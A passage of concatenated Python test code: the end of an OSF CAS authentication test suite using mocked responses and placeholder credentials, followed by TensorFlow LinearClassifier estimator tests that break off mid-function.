def test_service_validate_invalid_ticket_raises_error(self):
url = furl.furl(self.base_url)
url.path.segments.extend(('p3', 'serviceValidate',))
service_url = 'http://test.osf.io'
# Return error response
responses.add(
responses.Response(
responses.GET,
url.url,
body='invalid ticket...',
status=500,
)
)
with assert_raises(cas.CasHTTPError):
self.client.service_validate('invalid', service_url)
@responses.activate
def test_profile_invalid_access_token_raises_error(self):
url = furl.furl(self.base_url)
url.path.segments.extend(('oauth2', 'profile',))
responses.add(
responses.Response(
responses.GET,
url.url,
status=500,
)
)
with assert_raises(cas.CasHTTPError):
self.client.profile('invalid-access-token')
@responses.activate
def test_application_token_revocation_succeeds(self):
url = self.client.get_auth_token_revocation_url()
client_id= 'fake_id'
client_secret = 'fake_secret'
responses.add(
responses.Response(
responses.POST,
url,
body={'client_id': client_id,
'client_secret': client_secret},
status=204
)
)
res = self.client.revoke_application_tokens(client_id, client_secret)
assert_equal(res, True)
@responses.activate
def test_application_token_revocation_fails(self):
url = self.client.get_auth_token_revocation_url()
client_id= 'fake_id'
client_secret = 'fake_secret'
responses.add(
responses.Response(
responses.POST,
url,
body={'client_id': client_id,
'client_secret': client_secret},
status=400
)
)
with assert_raises(cas.CasHTTPError):
res = self.client.revoke_application_tokens(client_id, client_secret)
@unittest.skip('finish me')
def test_profile_valid_access_token_returns_cas_response(self):
assert 0
@unittest.skip('finish me')
def test_get_login_url(self):
assert 0
@unittest.skip('finish me')
def test_get_logout_url(self):
assert 0
class TestCASTicketAuthentication(OsfTestCase):
def setUp(self):
OsfTestCase.setUp(self)
self.user = UserFactory()
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_success(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_service_validate.return_value = make_successful_response(self.user)
mock_get_user_from_cas_resp.return_value = (self.user, None, 'authenticate')
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
assert_equal(mock_get_user_from_cas_resp.call_count, 1)
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_failure(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_service_validate.return_value = make_failure_response()
mock_get_user_from_cas_resp.return_value = (None, None, None)
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
assert_equal(mock_get_user_from_cas_resp.call_count, 0)
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_invalidates_verification_key(self, mock_service_validate):
self.user.verification_key = fake.md5()
self.user.save()
mock_service_validate.return_value = make_successful_response(self.user)
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
self.user.reload()
assert_true(self.user.verification_key is None)
class TestCASExternalLogin(OsfTestCase):
def setUp(self):
super(TestCASExternalLogin, self).setUp()
self.user = UserFactory()
def test_get_user_from_cas_resp_already_authorized(self):
mock_response = make_external_response()
validated_creds = cas.validate_external_credential(mock_response.user)
self.user.external_identity = {
validated_creds['provider']: {
validated_creds['id']: 'VERIFIED'
}
}
self.user.save()
user, external_credential, action = cas.get_user_from_cas_resp(mock_response)
assert_equal(user._id, self.user._id)
assert_equal(external_credential, validated_creds)
assert_equal(action, 'authenticate')
def test_get_user_from_cas_resp_not_authorized(self):
user, external_credential, action = cas.get_user_from_cas_resp(make_external_response())
assert_equal(user, None)
assert_true(external_credential is not None)
assert_equal(action, 'external_first_login')
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_with_user(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_response = make_external_response()
mock_service_validate.return_value = mock_response
validated_creds = cas.validate_external_credential(mock_response.user)
self.user.external_identity = {
validated_creds['provider']: {
validated_creds['id']: 'VERIFIED'
}
}
self.user.save()
mock_get_user_from_cas_resp.return_value = (self.user, validated_creds, 'authenticate')
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(mock_service_validate.call_count, 1)
assert_true(mock_get_user_from_cas_resp.call_count, 1)
assert_equal(resp.status_code, 302)
assert_in('/logout?service=', resp.headers['Location'])
assert_in('/login?service=', resp.headers['Location'])
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_no_user(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_response = make_external_response()
mock_service_validate.return_value = mock_response
validated_creds = cas.validate_external_credential(mock_response.user)
mock_get_user_from_cas_resp.return_value = (None, validated_creds, 'external_first_login')
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(mock_service_validate.call_count, 1)
assert_true(mock_get_user_from_cas_resp.call_count, 1)
assert_equal(resp.status_code, 302)
assert_equal(resp.location, '/external-login/email')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_generates_new_verification_key(self, mock_service_validate):
self.user.verification_key = fake.md5()
self.user.save()
mock_response = make_external_response()
validated_creds = cas.validate_external_credential(mock_response.user)
self.user.external_identity = {
validated_creds['provider']: {
validated_creds['id']: 'VERIFIED'
}
}
self.user.save()
mock_service_validate.return_value = mock_response
ticket = fake.md5()
service_url = 'http://localhost:5000/'
verification_key = self.user.verification_key
resp = cas.make_response_from_ticket(ticket, service_url)
self.user.reload()
assert_not_equal(self.user.verification_key, verification_key)
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_handles_unicode(self, mock_service_validate):
mock_response = make_external_response(unicode=True)
mock_service_validate.return_value = mock_response
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
first_call_args = mock_service_validate.call_args[0]
assert_equal(first_call_args[0], ticket)
assert_equal(first_call_args[1], 'http://localhost:5000/')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_handles_non_unicode(self, mock_service_validate):
mock_response = make_external_response()
mock_service_validate.return_value = mock_response
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
first_call_args = mock_service_validate.call_args[0]
assert_equal(first_call_args[0], ticket)
assert_equal(first_call_args[1], 'http://localhost:5000/')
|
erinspace/osf.io
|
tests/test_cas_authentication.py
|
Python
|
apache-2.0
| 14,414
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for estimators.linear."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import tempfile
import numpy as np
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.estimators import _sklearn
from tensorflow.contrib.learn.python.learn.estimators import estimator_test_utils
from tensorflow.contrib.learn.python.learn.metric_spec import MetricSpec
def _prepare_iris_data_for_logistic_regression():
# Converts iris data to a logistic regression problem.
iris = tf.contrib.learn.datasets.load_iris()
ids = np.where((iris.target == 0) | (iris.target == 1))
iris = tf.contrib.learn.datasets.base.Dataset(data=iris.data[ids],
target=iris.target[ids])
return iris
def _iris_input_fn():
iris = tf.contrib.learn.datasets.load_iris()
return {
'feature': tf.constant(iris.data, dtype=tf.float32)
}, tf.constant(iris.target, shape=[150, 1], dtype=tf.int32)
class LinearClassifierTest(tf.test.TestCase):
def testEstimatorContract(self):
estimator_test_utils.assert_estimator_contract(
self, tf.contrib.learn.LinearClassifier)
def testTrain(self):
"""Tests that loss goes down with training."""
def input_fn():
return {
'age': tf.constant([1]),
'language': tf.SparseTensor(values=['english'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age, language])
classifier.fit(input_fn=input_fn, steps=100)
loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
classifier.fit(input_fn=input_fn, steps=200)
loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss2, loss1)
self.assertLess(loss2, 0.01)
def testJointTrain(self):
"""Tests that loss goes down with training with joint weights."""
def input_fn():
return {
'age': tf.SparseTensor(values=['1'], indices=[[0, 0]], shape=[1, 1]),
'language': tf.SparseTensor(values=['english'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.sparse_column_with_hash_bucket('age', 2)
classifier = tf.contrib.learn.LinearClassifier(
_joint_weight=True,
feature_columns=[age, language])
classifier.fit(input_fn=input_fn, steps=100)
loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
classifier.fit(input_fn=input_fn, steps=200)
loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss2, loss1)
self.assertLess(loss2, 0.01)
def testMultiClass_MatrixData(self):
"""Tests multi-class classification using matrix data as input."""
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
feature_columns=[feature_column])
classifier.fit(input_fn=_iris_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_iris_input_fn, steps=100)
self.assertGreater(scores['accuracy'], 0.9)
def testMultiClass_MatrixData_Labels1D(self):
"""Same as the last test, but labels shape is [150] instead of [150, 1]."""
def _input_fn():
iris = tf.contrib.learn.datasets.load_iris()
return {
'feature': tf.constant(iris.data, dtype=tf.float32)
}, tf.constant(iris.target, shape=[150], dtype=tf.int32)
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
feature_columns=[feature_column])
classifier.fit(input_fn=_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testMultiClass_NpMatrixData(self):
"""Tests multi-class classification using numpy matrix data as input."""
iris = tf.contrib.learn.datasets.load_iris()
train_x = iris.data
train_y = iris.target
feature_column = tf.contrib.layers.real_valued_column('', dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
feature_columns=[feature_column])
classifier.fit(x=train_x, y=train_y, steps=100)
scores = classifier.evaluate(x=train_x, y=train_y, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testLogisticRegression_MatrixData(self):
"""Tests binary classification using matrix data as input."""
def _input_fn():
iris = _prepare_iris_data_for_logistic_regression()
return {
'feature': tf.constant(iris.data, dtype=tf.float32)
}, tf.constant(iris.target, shape=[100, 1], dtype=tf.int32)
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[feature_column])
classifier.fit(input_fn=_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testLogisticRegression_MatrixData_Labels1D(self):
"""Same as the last test, but labels shape is [100] instead of [100, 1]."""
def _input_fn():
iris = _prepare_iris_data_for_logistic_regression()
return {
'feature': tf.constant(iris.data, dtype=tf.float32)
}, tf.constant(iris.target, shape=[100], dtype=tf.int32)
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[feature_column])
classifier.fit(input_fn=_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testLogisticRegression_NpMatrixData(self):
"""Tests binary classification using numpy matrix data as input."""
iris = _prepare_iris_data_for_logistic_regression()
train_x = iris.data
train_y = iris.target
feature_columns = [tf.contrib.layers.real_valued_column('', dimension=4)]
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=feature_columns)
classifier.fit(x=train_x, y=train_y, steps=100)
scores = classifier.evaluate(x=train_x, y=train_y, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testWeightAndBiasNames(self):
"""Tests that weight and bias names haven't changed."""
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
feature_columns=[feature_column])
classifier.fit(input_fn=_iris_input_fn, steps=100)
self.assertEqual(4, len(classifier.weights_))
self.assertEqual(3, len(classifier.bias_))
def testCustomOptimizerByObject(self):
"""Tests multi-class classification using matrix data as input."""
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
optimizer=tf.train.FtrlOptimizer(learning_rate=0.1),
feature_columns=[feature_column])
classifier.fit(input_fn=_iris_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_iris_input_fn, steps=100)
self.assertGreater(scores['accuracy'], 0.9)
def testCustomOptimizerByString(self):
"""Tests multi-class classification using matrix data as input."""
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
def _optimizer():
return tf.train.FtrlOptimizer(learning_rate=0.1)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
optimizer=_optimizer,
feature_columns=[feature_column])
classifier.fit(input_fn=_iris_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_iris_input_fn, steps=100)
self.assertGreater(scores['accuracy'], 0.9)
def testCustomOptimizerByFunction(self):
"""Tests multi-class classification using matrix data as input."""
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
optimizer='Ftrl',
feature_columns=[feature_column])
classifier.fit(input_fn=_iris_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_iris_input_fn, steps=100)
self.assertGreater(scores['accuracy'], 0.9)
def testCustomMetrics(self):
"""Tests custom evaluation metrics."""
def _input_fn(num_epochs=None):
# Create 4 rows, one of them (y = x), three of them (y=Not(x))
labels = tf.constant([[1], [0], [0], [0]], dtype=tf.float32)
features = {'x': tf.train.limit_epochs(
tf.ones(shape=[4, 1], dtype=tf.float32), num_epochs=num_epochs)}
return features, labels
def _my_metric_op(predictions, labels):
# For the case of binary classification, the 2nd column of "predictions"
# denotes the model predictions.
predictions = tf.slice(predictions, [0, 1], [-1, 1])
return tf.reduce_sum(tf.mul(predictions, labels))
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[tf.contrib.layers.real_valued_column('x')])
classifier.fit(input_fn=_input_fn, steps=100)
scores = classifier.evaluate(
input_fn=_input_fn,
steps=100,
metrics={
'my_accuracy': MetricSpec(
metric_fn=tf.contrib.metrics.streaming_accuracy,
prediction_key='classes'),
'my_precision': MetricSpec(
metric_fn=tf.contrib.metrics.streaming_precision,
prediction_key='classes'),
'my_metric': MetricSpec(metric_fn=_my_metric_op,
prediction_key='probabilities')
})
self.assertTrue(
set(['loss', 'my_accuracy', 'my_precision', 'my_metric'
]).issubset(set(scores.keys())))
predict_input_fn = functools.partial(_input_fn, num_epochs=1)
predictions = np.array(list(classifier.predict(input_fn=predict_input_fn)))
self.assertEqual(_sklearn.accuracy_score([1, 0, 0, 0], predictions),
scores['my_accuracy'])
# Tests the case where the prediction_key is neither "classes" nor
# "probabilities".
with self.assertRaisesRegexp(KeyError, 'bad_type'):
classifier.evaluate(
input_fn=_input_fn,
steps=100,
metrics={
'bad_name': MetricSpec(
metric_fn=tf.contrib.metrics.streaming_auc,
prediction_key='bad_type')})
# Tests the case where the 2nd element of the key is neither "classes" nor
# "probabilities".
with self.assertRaises(KeyError):
classifier.evaluate(
input_fn=_input_fn,
steps=100,
metrics={('bad_name', 'bad_type'): tf.contrib.metrics.streaming_auc})
# Tests the case where the tuple of the key doesn't have 2 elements.
with self.assertRaises(ValueError):
classifier.evaluate(
input_fn=_input_fn,
steps=100,
metrics={
('bad_length_name', 'classes', 'bad_length'):
tf.contrib.metrics.streaming_accuracy
})
def testLogisticFractionalLabels(self):
"""Tests logistic training with fractional labels."""
def input_fn(num_epochs=None):
return {
'age': tf.train.limit_epochs(
tf.constant([[1], [2]]), num_epochs=num_epochs),
}, tf.constant([[.7], [0]], dtype=tf.float32)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age],
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
classifier.fit(input_fn=input_fn, steps=500)
predict_input_fn = functools.partial(input_fn, num_epochs=1)
predictions_proba = list(
classifier.predict_proba(input_fn=predict_input_fn))
# Prediction probabilities mirror the labels column, which proves that the
# classifier learns from float input.
self.assertAllClose([[.3, .7], [1., 0.]], predictions_proba, atol=.1)
def testTrainWithPartitionedVariables(self):
"""Tests training with partitioned variables."""
def _input_fn():
features = {
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
labels = tf.constant([[1], [0], [0]])
return features, labels
sparse_features = [
# The given hash_bucket_size results in variables larger than the
# default min_slice_size attribute, so the variables are partitioned.
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=2e7)
]
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=sparse_features,
# Because we did not start a distributed cluster, we need to pass an
# empty ClusterSpec, otherwise the device_setter will look for
# distributed jobs, such as "/job:ps" which are not present.
config=tf.contrib.learn.RunConfig(
num_ps_replicas=2, cluster_spec=tf.train.ClusterSpec({})))
classifier.fit(input_fn=_input_fn, steps=200)
loss = classifier.evaluate(input_fn=_input_fn, steps=1)['loss']
self.assertLess(loss, 0.07)
def testTrainSaveLoad(self):
"""Tests that insures you can save and reload a trained model."""
def input_fn(num_epochs=None):
return {
'age': tf.train.limit_epochs(tf.constant([1]), num_epochs=num_epochs),
'language': tf.SparseTensor(
values=['english'], indices=[[0, 0]], shape=[1, 1]),
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
model_dir = tempfile.mkdtemp()
classifier = tf.contrib.learn.LinearClassifier(
model_dir=model_dir,
feature_columns=[age, language])
classifier.fit(input_fn=input_fn, steps=30)
predict_input_fn = functools.partial(input_fn, num_epochs=1)
out1_class = list(classifier.predict(input_fn=predict_input_fn,
as_iterable=True))
out1_proba = list(classifier.predict_proba(input_fn=predict_input_fn,
as_iterable=True))
del classifier
classifier2 = tf.contrib.learn.LinearClassifier(
model_dir=model_dir,
feature_columns=[age, language])
out2_class = list(classifier2.predict(input_fn=predict_input_fn,
as_iterable=True))
out2_proba = list(classifier2.predict_proba(input_fn=predict_input_fn,
as_iterable=True))
self.assertTrue(np.array_equal(out1_class, out2_class))
self.assertTrue(np.array_equal(out1_proba, out2_proba))
def testWeightColumn(self):
"""Tests training with given weight column."""
def _input_fn_train():
# Create 4 rows, one of them (y = x), three of them (y=Not(x))
# First row has more weight than others. Model should fit (y=x) better
# than (y=Not(x)) due to the relative higher weight of the first row.
labels = tf.constant([[1], [0], [0], [0]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
'w': tf.constant([[100.], [3.], [2.], [2.]])
}
return features, labels
def _input_fn_eval():
# Create 4 rows (y = x)
labels = tf.constant([[1], [1], [1], [1]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
'w': tf.constant([[1.], [1.], [1.], [1.]])
}
return features, labels
classifier = tf.contrib.learn.LinearClassifier(
weight_column_name='w',
feature_columns=[tf.contrib.layers.real_valued_column('x')],
config=tf.contrib.learn.RunConfig(tf_random_seed=3))
classifier.fit(input_fn=_input_fn_train, steps=100)
scores = classifier.evaluate(input_fn=_input_fn_eval, steps=1)
# All examples in eval data set are y=x.
self.assertGreater(scores['labels/actual_label_mean'], 0.9)
# If there were no weight column, model would learn y=Not(x). Because of
# weights, it learns y=x.
self.assertGreater(scores['labels/prediction_mean'], 0.9)
# All examples in eval data set are y=x. So if weight column were ignored,
# then accuracy would be zero. Because of weights, accuracy should be close
# to 1.0.
self.assertGreater(scores['accuracy'], 0.9)
scores_train_set = classifier.evaluate(input_fn=_input_fn_train, steps=1)
# Considering weights, the mean label should be close to 1.0.
# If weights were ignored, it would be 0.25.
self.assertGreater(scores_train_set['labels/actual_label_mean'], 0.9)
# The classifier has learned y=x. If weight column were ignored in
# evaluation, then accuracy for the train set would be 0.25.
# Because weight is not ignored, accuracy is greater than 0.6.
self.assertGreater(scores_train_set['accuracy'], 0.6)
def testWeightColumnLoss(self):
"""Test ensures that you can specify per-example weights for loss."""
def _input_fn():
features = {
'age': tf.constant([[20], [20], [20]]),
'weights': tf.constant([[100], [1], [1]]),
}
labels = tf.constant([[1], [0], [0]])
return features, labels
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age])
classifier.fit(input_fn=_input_fn, steps=100)
loss_unweighted = classifier.evaluate(input_fn=_input_fn, steps=1)['loss']
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age],
weight_column_name='weights')
classifier.fit(input_fn=_input_fn, steps=100)
loss_weighted = classifier.evaluate(input_fn=_input_fn, steps=1)['loss']
self.assertLess(loss_weighted, loss_unweighted)
def testExport(self):
"""Tests that export model for servo works."""
def input_fn():
return {
'age': tf.constant([1]),
'language': tf.SparseTensor(values=['english'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age, language])
classifier.fit(input_fn=input_fn, steps=100)
export_dir = tempfile.mkdtemp()
classifier.export(export_dir)
def testDisableCenteredBias(self):
"""Tests that we can disable centered bias."""
def input_fn():
return {
'age': tf.constant([1]),
'language': tf.SparseTensor(values=['english'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age, language], enable_centered_bias=False)
classifier.fit(input_fn=input_fn, steps=100)
self.assertFalse('centered_bias_weight' in classifier.get_variable_names())
def testEnableCenteredBias(self):
"""Tests that we can disable centered bias."""
def input_fn():
return {
'age': tf.constant([1]),
'language': tf.SparseTensor(values=['english'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age, language], enable_centered_bias=True)
classifier.fit(input_fn=input_fn, steps=100)
self.assertTrue('centered_bias_weight' in classifier.get_variable_names())
def testTrainOptimizerWithL1Reg(self):
"""Tests l1 regularized model has higher loss."""
def input_fn():
return {
'language': tf.SparseTensor(values=['hindi'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
classifier_no_reg = tf.contrib.learn.LinearClassifier(
feature_columns=[language])
classifier_with_reg = tf.contrib.learn.LinearClassifier(
feature_columns=[language],
optimizer=tf.train.FtrlOptimizer(learning_rate=1.0,
l1_regularization_strength=100.))
loss_no_reg = classifier_no_reg.fit(
input_fn=input_fn, steps=100).evaluate(
input_fn=input_fn, steps=1)['loss']
loss_with_reg = classifier_with_reg.fit(
input_fn=input_fn, steps=100).evaluate(
input_fn=input_fn, steps=1)['loss']
self.assertLess(loss_no_reg, loss_with_reg)
def testTrainWithMissingFeature(self):
"""Tests that training works with missing features."""
def input_fn():
return {
'language': tf.SparseTensor(values=['Swahili', 'turkish'],
indices=[[0, 0], [2, 0]],
shape=[3, 1])
}, tf.constant([[1], [1], [1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
classifier = tf.contrib.learn.LinearClassifier(feature_columns=[language])
classifier.fit(input_fn=input_fn, steps=100)
loss = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss, 0.07)
def testSdcaOptimizerRealValuedFeatures(self):
"""Tests LinearClasssifier with SDCAOptimizer and real valued features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2']),
'maintenance_cost': tf.constant([[500.0], [200.0]]),
'sq_footage': tf.constant([[800.0], [600.0]]),
'weights': tf.constant([[1.0], [1.0]])
}, tf.constant([[0], [1]])
maintenance_cost = tf.contrib.layers.real_valued_column('maintenance_cost')
sq_footage = tf.contrib.layers.real_valued_column('sq_footage')
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[maintenance_cost, sq_footage],
weight_column_name='weights',
optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=100)
loss = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss, 0.05)
def testSdcaOptimizerRealValuedFeatureWithHigherDimension(self):
"""Tests SDCAOptimizer with real valued features of higher dimension."""
# input_fn is identical to the one in testSdcaOptimizerRealValuedFeatures
# where 2 1-dimensional dense features have been replaced by 1 2-dimensional
# feature.
def input_fn():
return {
'example_id': tf.constant(['1', '2']),
'dense_feature': tf.constant([[500.0, 800.0], [200.0, 600.0]])
}, tf.constant([[0], [1]])
dense_feature = tf.contrib.layers.real_valued_column(
'dense_feature', dimension=2)
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[dense_feature], optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=100)
loss = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss, 0.05)
def testSdcaOptimizerBucketizedFeatures(self):
"""Tests LinearClasssifier with SDCAOptimizer and bucketized features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'price': tf.constant([[600.0], [1000.0], [400.0]]),
'sq_footage': tf.constant([[1000.0], [600.0], [700.0]]),
'weights': tf.constant([[1.0], [1.0], [1.0]])
}, tf.constant([[1], [0], [1]])
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column('price'),
boundaries=[500.0, 700.0])
sq_footage_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column('sq_footage'),
boundaries=[650.0])
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id',
symmetric_l2_regularization=1.0)
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[price_bucket, sq_footage_bucket],
weight_column_name='weights',
optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=50)
scores = classifier.evaluate(input_fn=input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testSdcaOptimizerSparseFeatures(self):
"""Tests LinearClasssifier with SDCAOptimizer and sparse features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'price': tf.constant([[0.4], [0.6], [0.3]]),
'country': tf.SparseTensor(values=['IT', 'US', 'GB'],
indices=[[0, 0], [1, 3], [2, 1]],
shape=[3, 5]),
'weights': tf.constant([[1.0], [1.0], [1.0]])
}, tf.constant([[1], [0], [1]])
price = tf.contrib.layers.real_valued_column('price')
country = tf.contrib.layers.sparse_column_with_hash_bucket(
'country', hash_bucket_size=5)
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[price, country],
weight_column_name='weights',
optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=50)
scores = classifier.evaluate(input_fn=input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testSdcaOptimizerWeightedSparseFeatures(self):
"""LinearClasssifier with SDCAOptimizer and weighted sparse features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'price': tf.SparseTensor(values=[2., 3., 1.],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 5]),
'country': tf.SparseTensor(values=['IT', 'US', 'GB'],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 5])
}, tf.constant([[1], [0], [1]])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
'country', hash_bucket_size=5)
country_weighted_by_price = tf.contrib.layers.weighted_sparse_column(
country, 'price')
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[country_weighted_by_price],
optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=50)
scores = classifier.evaluate(input_fn=input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testSdcaOptimizerCrossedFeatures(self):
"""Tests LinearClasssifier with SDCAOptimizer and crossed features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'language': tf.SparseTensor(values=['english', 'italian', 'spanish'],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1]),
'country': tf.SparseTensor(values=['US', 'IT', 'MX'],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
